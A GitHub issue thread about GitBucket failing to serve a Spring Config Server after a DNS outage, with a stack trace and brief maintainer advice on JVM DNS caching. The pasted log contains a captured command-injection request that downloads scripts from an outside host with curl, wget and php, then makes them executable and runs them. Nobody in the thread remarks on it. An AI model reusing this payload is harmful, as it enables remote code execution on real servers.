### ISSUE TITLE
Spring Config Server cannot fetch gitbucket repository

### ISSUE THREAD

**Issue by deddy11** [gitbucket/gitbucket#2704]
## Issue
**Impacted version**: xxxx

**Deployment mode**: *on docker container*

**Problem description**:
An error occurs after my server DNS expired. I use spring config server which fetching git repository from gitbucket. After server DNS restored, my config server still could not fetch from gitbucket. I checked my gitbucket container log and saw below error. After restarting my gitbucket container, everything is running well as before. What can I do to prevent this happens again?

**Error log**:
```
20:29:28.662 [qtp610998173-3315] ERROR g.c.controller.PreProcessController - Catch unhandled error in request: Request(POST //178.128.216.154:8081/include/makecvs.php?Event=%60php%20-r%20%22file_put_contents%28%5C%22.benchmark%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Fkek.gay%2Fbenchmark%5C%22%29%29%3B%22%3Bcurl%20http%3A%2F%2Fkek.gay%2Fbenchmark%20-O%3Bcurl%20http%3A%2F%2Fkek.gay%2Fbenchmark.py%20-O%3Bphp%20-r%20%22file_put_contents%28%5C%22.benchmark.py%5C%22%2C%20file_get_contents%28%5C%22http%3A%2F%2Fkek.gay%2Fbenchmark.py%5C%22%29%29%3B%22%3Bwget%20http%3A%2F%2Fkek.gay%2Fbenchmark%20-O%20.benchmark%3Bwget%20http%3A%2F%2Fkek.gay%2Fbenchmark.py%20-O%20.benchmark.py%3Bchmod%20777%20.benchmark.py%3Bchmod%20777%20.benchmark%3Bpython2%20.benchmark.py%7C%7Cpython2.7%20.benchmark.py%7C%7Cpython%20.benchmark.py%7C%7C.%2F.benchmark.py%7C%7C.%2F.benchmark%60)@74198740
org.eclipse.jetty.io.RuntimeIOException: org.eclipse.jetty.io.EofException: Early EOF
	at org.eclipse.jetty.server.Request.extractFormParameters(Request.java:573)
	at org.eclipse.jetty.server.Request.extractContentParameters(Request.java:519)
	at org.eclipse.jetty.server.Request.getParameters(Request.java:430)
	at org.eclipse.jetty.server.Request.getParameterMap(Request.java:1068)
	at org.scalatra.servlet.RichRequest.multiParameters(RichRequest.scala:79)
	at org.scalatra.ScalatraBase.$anonfun$multiParams$2(ScalatraBase.scala:812)
	at scala.Option.getOrElse(Option.scala:201)
	at org.scalatra.ScalatraBase.multiParams(ScalatraBase.scala:812)
	at org.scalatra.ScalatraBase.multiParams$(ScalatraBase.scala:808)
	at gitbucket.core.controller.ControllerBase.multiParams(ControllerBase.scala:35)
	at org.scalatra.ApiFormats.withRouteMultiParams(ApiFormats.scala:172)
	at org.scalatra.ApiFormats.withRouteMultiParams$(ApiFormats.scala:171)
	at gitbucket.core.controller.ControllerBase.withRouteMultiParams(ControllerBase.scala:35)
	at org.scalatra.ScalatraBase.invoke(ScalatraBase.scala:275)
	at org.scalatra.ScalatraBase.invoke$(ScalatraBase.scala:274)
	at gitbucket.core.controller.ControllerBase.invoke(ControllerBase.scala:35)
	at org.scalatra.ScalatraBase.$anonfun$runFilters$2(ScalatraBase.scala:238)
	at scala.Option.foreach(Option.scala:437)
	at org.scalatra.ScalatraBase.$anonfun$runFilters$1(ScalatraBase.scala:237)
	at org.scalatra.ScalatraBase.$anonfun$runFilters$1$adapted(ScalatraBase.scala:236)
	at scala.collection.IterableOnceOps.foreach(IterableOnce.scala:553)
	at scala.collection.IterableOnceOps.foreach$(IterableOnce.scala:551)
	at scala.collection.AbstractIterable.foreach(Iterable.scala:921)
	at org.scalatra.ScalatraBase.runFilters(ScalatraBase.scala:236)
	at org.scalatra.ScalatraBase.runFilters$(ScalatraBase.scala:234)
	at gitbucket.core.controller.ControllerBase.runFilters(ControllerBase.scala:35)
	at org.scalatra.ScalatraBase.runActions$1(ScalatraBase.scala:168)
	at org.scalatra.ScalatraBase.$anonfun$executeRoutes$6(ScalatraBase.scala:181)
	at scala.runtime.java8.JFunction0$mcV$sp.apply(JFunction0$mcV$sp.scala:18)
	at org.scalatra.ScalatraBase.cradleHalt(ScalatraBase.scala:201)
	at org.scalatra.ScalatraBase.executeRoutes(ScalatraBase.scala:181)
	at org.scalatra.ScalatraBase.executeRoutes$(ScalatraBase.scala:150)
	at gitbucket.core.controller.ControllerBase.executeRoutes(ControllerBase.scala:35)
	at org.scalatra.ScalatraBase.$anonfun$handle$1(ScalatraBase.scala:123)
	at scala.runtime.java8.JFunction0$mcV$sp.apply(JFunction0$mcV$sp.scala:18)
	at scala.util.DynamicVariable.withValue(DynamicVariable.scala:59)
	at org.scalatra.DynamicScope.withResponse(DynamicScope.scala:75)
	at org.scalatra.DynamicScope.withResponse$(DynamicScope.scala:73)
	at gitbucket.core.controller.ControllerBase.withResponse(ControllerBase.scala:35)
	at org.scalatra.DynamicScope.$anonfun$withRequestResponse$1(DynamicScope.scala:55)
	at scala.util.DynamicVariable.withValue(DynamicVariable.scala:59)
	at org.scalatra.DynamicScope.withRequest(DynamicScope.scala:66)
	at org.scalatra.DynamicScope.withRequest$(DynamicScope.scala:64)
	at gitbucket.core.controller.ControllerBase.withRequest(ControllerBase.scala:35)
	at org.scalatra.DynamicScope.withRequestResponse(DynamicScope.scala:54)
	at org.scalatra.DynamicScope.withRequestResponse$(DynamicScope.scala:52)
	at gitbucket.core.controller.ControllerBase.withRequestResponse(ControllerBase.scala:35)
	at org.scalatra.ScalatraBase.handle(ScalatraBase.scala:123)
	at org.scalatra.ScalatraBase.handle$(ScalatraBase.scala:119)
	at gitbucket.core.controller.ControllerBase.org$scalatra$servlet$ServletBase$$super$handle(ControllerBase.scala:35)
	at org.scalatra.servlet.ServletBase.handle(ServletBase.scala:42)
	at org.scalatra.servlet.ServletBase.handle$(ServletBase.scala:35)
	at gitbucket.core.controller.ControllerBase.org$scalatra$FlashMapSupport$$super$handle(ControllerBase.scala:35)
	at org.scalatra.FlashMapSupport.$anonfun$handle$1(FlashMap.scala:197)
	at scala.runtime.java8.JFunction0$mcV$sp.apply(JFunction0$mcV$sp.scala:18)
	at scala.util.DynamicVariable.withValue(DynamicVariable.scala:59)
	at org.scalatra.DynamicScope.withRequest(DynamicScope.scala:66)
	at org.scalatra.DynamicScope.withRequest$(DynamicScope.scala:64)
	at gitbucket.core.controller.ControllerBase.withRequest(ControllerBase.scala:35)
	at org.scalatra.FlashMapSupport.handle(FlashMap.scala:172)
	at org.scalatra.FlashMapSupport.handle$(FlashMap.scala:171)
	at gitbucket.core.controller.ControllerBase.handle(ControllerBase.scala:35)
	at org.scalatra.ScalatraFilter.$anonfun$doFilter$1(ScalatraFilter.scala:41)
	at scala.runtime.java8.JFunction0$mcV$sp.apply(JFunction0$mcV$sp.scala:18)
	at scala.util.DynamicVariable.withValue(DynamicVariable.scala:59)
	at org.scalatra.ScalatraFilter.doFilter(ScalatraFilter.scala:41)
	at org.scalatra.ScalatraFilter.doFilter$(ScalatraFilter.scala:36)
	at gitbucket.core.controller.ControllerBase.doFilter(ControllerBase.scala:73)
	at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1618)
	at gitbucket.core.servlet.TransactionFilter.$anonfun$doFilter$1(TransactionFilter.scala:39)
	at gitbucket.core.servlet.TransactionFilter.$anonfun$doFilter$1$adapted(TransactionFilter.scala:30)
	at com.github.takezoe.slick.blocking.BlockingJdbcProfile$BlockingAPI$BlockingDatabase.$anonfun$withTransaction$2(BlockingProfile.scala:207)
	at slick.JdbcProfileBlockingSession$BlockingSession.withTransaction(TransactionalJdbcBackend.scala:26)
	at com.github.takezoe.slick.blocking.BlockingJdbcProfile$BlockingAPI$BlockingDatabase.$anonfun$withTransaction$1(BlockingProfile.scala:207)
	at com.github.takezoe.slick.blocking.BlockingJdbcProfile$BlockingAPI$BlockingDatabase.withSession(BlockingProfile.scala:200)
	at com.github.takezoe.slick.blocking.BlockingJdbcProfile$BlockingAPI$BlockingDatabase.withTransaction(BlockingProfile.scala:207)
	at gitbucket.core.servlet.TransactionFilter.doFilter(TransactionFilter.scala:30)
	at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1610)
	at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:549)
	at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143)
	at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:602)
	at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:127)
	at org.eclipse.jetty.server.handler.ScopedHandler.nextHandle(ScopedHandler.java:235)
	at org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:1610)
	at org.eclipse.jetty.server.handler.ScopedHandler.nextHandle(ScopedHandler.java:233)
	at org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1369)
	at org.eclipse.jetty.server.handler.ScopedHandler.nextScope(ScopedHandler.java:188)
	at org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:489)
	at org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:1580)
	at org.eclipse.jetty.server.handler.ScopedHandler.nextScope(ScopedHandler.java:186)
	at org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1284)
	at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:141)
	at org.eclipse.jetty.server.handler.StatisticsHandler.handle(StatisticsHandler.java:173)
	at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:127)
	at org.eclipse.jetty.server.Server.handle(Server.java:501)
	at org.eclipse.jetty.server.HttpChannel.lambda$handle$1(HttpChannel.java:383)
	at org.eclipse.jetty.server.HttpChannel.dispatch(HttpChannel.java:556)
	at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:375)
	at org.eclipse.jetty.server.HttpChannelOverHttp.earlyEOF(HttpChannelOverHttp.java:237)
	at org.eclipse.jetty.http.HttpParser.parseNext(HttpParser.java:1595)
	at org.eclipse.jetty.server.HttpConnection.parseRequestBuffer(HttpConnection.java:363)
	at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:260)
	at org.eclipse.jetty.io.AbstractConnection$ReadCallback.succeeded(AbstractConnection.java:311)
	at org.eclipse.jetty.io.FillInterest.fillable(FillInterest.java:103)
	at org.eclipse.jetty.io.ChannelEndPoint$1.run(ChannelEndPoint.java:104)
	at org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.runTask(EatWhatYouKill.java:336)
	at org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.doProduce(EatWhatYouKill.java:313)
	at org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.tryProduce(EatWhatYouKill.java:171)
	at org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.run(EatWhatYouKill.java:129)
	at org.eclipse.jetty.util.thread.ReservedThreadExecutor$ReservedThread.run(ReservedThreadExecutor.java:375)
	at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:806)
	at org.eclipse.jetty.util.thread.QueuedThreadPool$Runner.run(QueuedThreadPool.java:938)
	at java.lang.Thread.run(Thread.java:748)
Caused by: org.eclipse.jetty.io.EofException: Early EOF
	at org.eclipse.jetty.server.HttpInput$3.getError(HttpInput.java:1141)
	at org.eclipse.jetty.server.HttpInput$3.noContent(HttpInput.java:1129)
	at org.eclipse.jetty.server.HttpInput.read(HttpInput.java:321)
	at org.eclipse.jetty.server.HttpInput.read(HttpInput.java:258)
	at org.eclipse.jetty.util.UrlEncoded.decodeUtf8To(UrlEncoded.java:485)
	at org.eclipse.jetty.util.UrlEncoded.decodeTo(UrlEncoded.java:577)
	at org.eclipse.jetty.server.Request.extractFormParameters(Request.java:568)
	... 112 common frames omitted
```

**Comment by takezoe** [comment]
I guess that issue was caused by DNS cache on JVM.

**Comment by deddy11** [comment]
@takezoe what should I do? should I make disable the DNS cache on JVM?

**Comment by takezoe** [comment]
That is a common issue on JVM. If this issue happens frequently in your environment, you should disable it.
